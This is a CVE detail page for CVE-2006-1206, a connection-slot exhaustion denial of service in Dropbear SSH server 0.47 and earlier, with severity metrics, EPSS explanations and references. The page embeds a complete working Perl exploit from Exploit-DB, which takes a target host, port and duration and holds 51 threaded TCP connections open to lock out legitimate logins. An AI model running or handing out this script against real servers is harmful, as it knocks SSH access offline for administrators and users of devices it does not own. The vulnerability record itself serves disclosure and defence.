CVE-2006-1206 : Detail

CVE-2006-1206

1.44%V3
Network
2006-03-14
00h00 +00:00
2018-10-18
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Matt Johnston Dropbear SSH server 0.47 and earlier, as used in embedded Linux devices and on general-purpose operating systems, allows remote attackers to cause a denial of service (connection slot exhaustion) via a large number of connection attempts that exceeds the MAX_UNAUTH_CLIENTS defined value of 30.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 1572

Publication date : 2006-03-09 23h00 +00:00
Author : str0ke
EDB Verified : Yes

#!/usr/bin/perl ## I needed a working test script so here it is. ## just a keep alive thread, I had a few problems with Pablo's code running properly. ## ## Straight from Pablo Fernandez's advisory: # Vulnerable code is in svr-main.c # # /* check for max number of connections not authorised */ # for (j = 0; j < MAX_UNAUTH_CLIENTS; j++) { # if (childpipes[j] < 0) { # break; # } # } # # if (j == MAX_UNAUTH_CLIENTS) { # /* no free connections */ # /* TODO - possibly log, though this would be an easy way # * to fill logs/disk */ # close(childsock); # continue; # } ## /str0ke (milw0rm.com) use IO::Socket; use Thread; use strict; # thanks to Perl Underground for my moronic coding style fixes. my ($serv, $port, $time) = @ARGV; sub usage { print "\nDropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service Exploit\n"; print "by /str0ke (milw0rm.com)\n"; print "Credits to Pablo Fernandez\n"; print "Usage: $0 [Target Domain] [Target Port] [Seconds to hold attack]\n"; exit (); } sub exploit { my ($serv, $port, $sleep) = @_; my $sock = new IO::Socket::INET ( PeerAddr => $serv, PeerPort => $port, Proto => 'tcp', ); die "Could not create socket: $!\n" unless $sock; sleep $sleep; close($sock); } sub thread { print "Server: $serv\nPort: $port\nSeconds: $time\n"; for my $i ( 1 .. 51 ) { print "."; my $thr = new Thread \&exploit, $serv, $port, $time; } sleep $time; #detach wouldn't be good } if (@ARGV != 3){&usage;}else{&thread;} # milw0rm.com [2006-03-10]

Products Mentioned

Configuraton 0

Dropbear_ssh_project>>Dropbear_ssh >> Version To (including) 0.47

References

http://www.securityfocus.com/bid/17024
Tags : vdb-entry, x_refsource_BID
http://securitytracker.com/id?1015742
Tags : vdb-entry, x_refsource_SECTRACK